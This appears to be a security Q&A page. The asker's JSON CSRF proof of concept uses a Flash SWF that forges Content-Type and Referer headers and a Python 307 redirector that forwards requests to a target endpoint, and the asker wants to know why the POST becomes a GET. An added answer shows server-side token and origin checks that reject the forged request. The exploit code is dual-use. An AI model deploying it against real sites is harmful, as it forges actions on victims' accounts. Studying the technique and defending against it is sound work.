
I was trying to recreate a POC where an endpoint didn't have CSRF protection and was exposing a form submission.

So, I have read these (before asking here):

  1. Vimeo hackerone Report by avlidienbrunn
  2. GeekBoy's Article on JSON CSRF
  3. StackOverflow Question : csrf-with-json-post-when-content-type-must-be-application-json
  4. Exploiting CSRF on JSON Endpoints

My ActionScript code looks like this:

package
{
  import flash.display.Sprite;
  import flash.net.URLLoader;
  import flash.net.URLRequest;
  import flash.net.URLRequestHeader;
  import flash.net.URLRequestMethod;

  public class csrf extends Sprite
  {
    public function csrf()
    {
      super();
      // Build the JSON body to be posted
      var member1:Object = null;
      var myJson:String = null;
      member1 = new Object();
      member1 = {
        "user_id":36427093
      };
      var myData:Object = member1;
      myJson = JSON.stringify(myData);

      // The request goes to the local redirector, which answers with a 307 to the target
      var url:String = "http://my-server:8000/";
      var request:URLRequest = new URLRequest(url);
      request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json;charset=utf-8"));
      request.requestHeaders.push(new URLRequestHeader("Referer","https://some-vulnerable-endpoint"));
      request.requestHeaders.push(new URLRequestHeader("X-Requested-With","https://some-vulnerable-endpoint"));
      request.data = myJson;
      request.method = URLRequestMethod.POST;
      var urlLoader:URLLoader = new URLLoader();

      try
      {
        urlLoader.load(request);
        return;
      }
      catch(e:Error)
      {
        trace(e);
        return;
      }
    }
  }
}

My Python pyredirector.py looks like this:

# Python 2 (BaseHTTPServer / print statement)
import BaseHTTPServer
import time
import sys

HOST = ''
PORT = 8000
vulnerable_endpoint = "https://some-vulnerable-endpoint-here"

class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  def do_POST(s):
    # Serve the compiled Flash file itself
    if s.path == '/csrf.swf':
      s.send_response(200)
      s.send_header("Content-Type", "application/x-shockwave-flash")
      s.end_headers()
      with open("csrf.swf", "rb") as swf:  # csrf.swf is the filename you compiled the above actionscript to
        s.wfile.write(swf.read())
      return
    # Every other path: 307 redirect to the target (307 is meant to preserve method and body)
    s.send_response(307)
    s.send_header("Location", vulnerable_endpoint)
    s.end_headers()
  def do_GET(s):
    print(s.path)
    s.do_POST()

if __name__ == '__main__':
  server_class = BaseHTTPServer.HTTPServer
  httpd = server_class((HOST, PORT), RedirectHandler)
  print time.asctime(), "Server Starts - %s:%s" % (HOST, PORT)
  try:
    httpd.serve_forever()
  except KeyboardInterrupt:
    pass
  httpd.server_close()
  print time.asctime(), "Server Stops - %s:%s" % (HOST, PORT)

Problem

Now, when I go to http://my-server:8000/, the csrf.swf redirects me to the vulnerable-endpoint but it makes a GET request and so my json payload is dropped and the CSRF doesn't happen.

Although I do have the line request.method = URLRequestMethod.POST; in the ActionScript code.

Now, I haven't done any coding in ActionScript, nor do I intend to. Seeing the hackerone report and the corresponding video PoC, the reporter's PoC worked just fine (however, it was 4 years back).

I don't understand why it's being forwarded as a GET request.

Thanks for bearing with my ignorance and naiveness.
Temporarya
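The question hinges on a JSON endpoint that accepted a cross-site POST because its only defence was, in effect, the Content-Type header, which the Flash-plus-307-redirect setup above can forge. The following is an added example (not the asker's code and not from any of the linked write-ups) of the checks a JSON endpoint should apply on the server so that such a request is rejected regardless of how it was produced. The origin allowlist, the session token and the two sample requests are constructed for this example; the forged sample mirrors the headers the ActionScript sets (JSON Content-Type, a Referer naming the target, no token).

```python
"""Server-side CSRF checks for a JSON endpoint (added example, Python 3).

Order of checks, weakest to strongest: a Content-Type or Referer check alone
is satisfiable by the forged request in the question, so the synchronizer
token comparison is the check that actually decides.
"""
import hmac
import json
from urllib.parse import urlsplit

# Assumption (constructed): the only origin allowed to send state-changing
# JSON requests to this endpoint.
ALLOWED_ORIGINS = {"https://app.example"}

# Constructed: the per-session CSRF token the server issued to the victim's
# browser earlier. A cross-site page cannot read it.
SESSION_TOKEN = "constructed-session-token-0123456789abcdef"


def request_origin(headers):
    """Return scheme://host[:port] of the requester from Origin, or derived
    from Referer when Origin is absent; None if neither is usable."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return "{}://{}".format(parts.scheme, parts.netloc)
    return None


def check_json_request(method, headers, body, session_token):
    """Return (accepted, reason) for an incoming JSON request."""
    # 1. Only POST carries a body; a redirect that downgraded to GET (the
    #    asker's symptom) is rejected here with the payload already gone.
    if method.upper() != "POST":
        return False, "method"
    # 2. Content-Type must be JSON: necessary, but forgeable, as the page shows.
    ctype = headers.get("Content-Type", "")
    if not ctype.lower().startswith("application/json"):
        return False, "content-type"
    # 3. Origin/Referer allowlist: a useful second layer, but Referer is
    #    exactly what the ActionScript above tries to set.
    if request_origin(headers) not in ALLOWED_ORIGINS:
        return False, "origin"
    # 4. Synchronizer token, compared in constant time. This is the check a
    #    cross-site page cannot satisfy, whatever headers it manages to send.
    token = headers.get("X-CSRF-Token", "")
    if not hmac.compare_digest(token, session_token):
        return False, "csrf-token"
    # 5. Only now parse the body.
    try:
        payload = json.loads(body)
    except ValueError:
        return False, "body"
    if not isinstance(payload, dict):
        return False, "body"
    return True, "ok"


# Constructed: a request the site's own front-end would send.
LEGIT_HEADERS = {
    "Content-Type": "application/json;charset=utf-8",
    "Origin": "https://app.example",
    "X-CSRF-Token": SESSION_TOKEN,
}

# Constructed: the redirector-based request from the question as it would
# arrive, with the JSON Content-Type and spoofed Referer but no token.
FORGED_HEADERS = {
    "Content-Type": "application/json;charset=utf-8",
    "Referer": "https://app.example/",
}

BODY = json.dumps({"user_id": 36427093})


def demo():
    """Run all three sample requests through the checks."""
    return {
        "legit": check_json_request("POST", LEGIT_HEADERS, BODY, SESSION_TOKEN),
        "forged": check_json_request("POST", FORGED_HEADERS, BODY, SESSION_TOKEN),
        "forged_as_get": check_json_request("GET", FORGED_HEADERS, "", SESSION_TOKEN),
    }


if __name__ == "__main__":
    for name, (accepted, reason) in demo().items():
        print("{:>14}: {} ({})".format(name, "accepted" if accepted else "rejected", reason))
```

Running it shows the legitimate request accepted, the forged POST passing the Content-Type and Referer checks and failing only on the token, and the GET variant rejected before the body is even looked at. The point for the endpoint owner is that steps 2 and 3 are defence in depth; step 4 is the control that decides.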

  • How did you confirm that it is making a GET request instead of a POST? Packet capture? Commented Feb 15, 2019 at 20:26
  • You can see it in the Network tab, in Chrome's developer tools. Commented Feb 15, 2019 at 20:35
  • If I'm reading this right, when you navigate to my-server:8000 the do_GET(s) runs, which calls do_POST(). If you want to process the initial GET as a POST then you may need to pass "s" when you call s.do_POST(s) from do_GET(). Commented Feb 15, 2019 at 21:23
  • It's self, as you can see in do_GET(); it's taken from the 4th article I mentioned in my post. Commented Feb 15, 2019 at 21:30
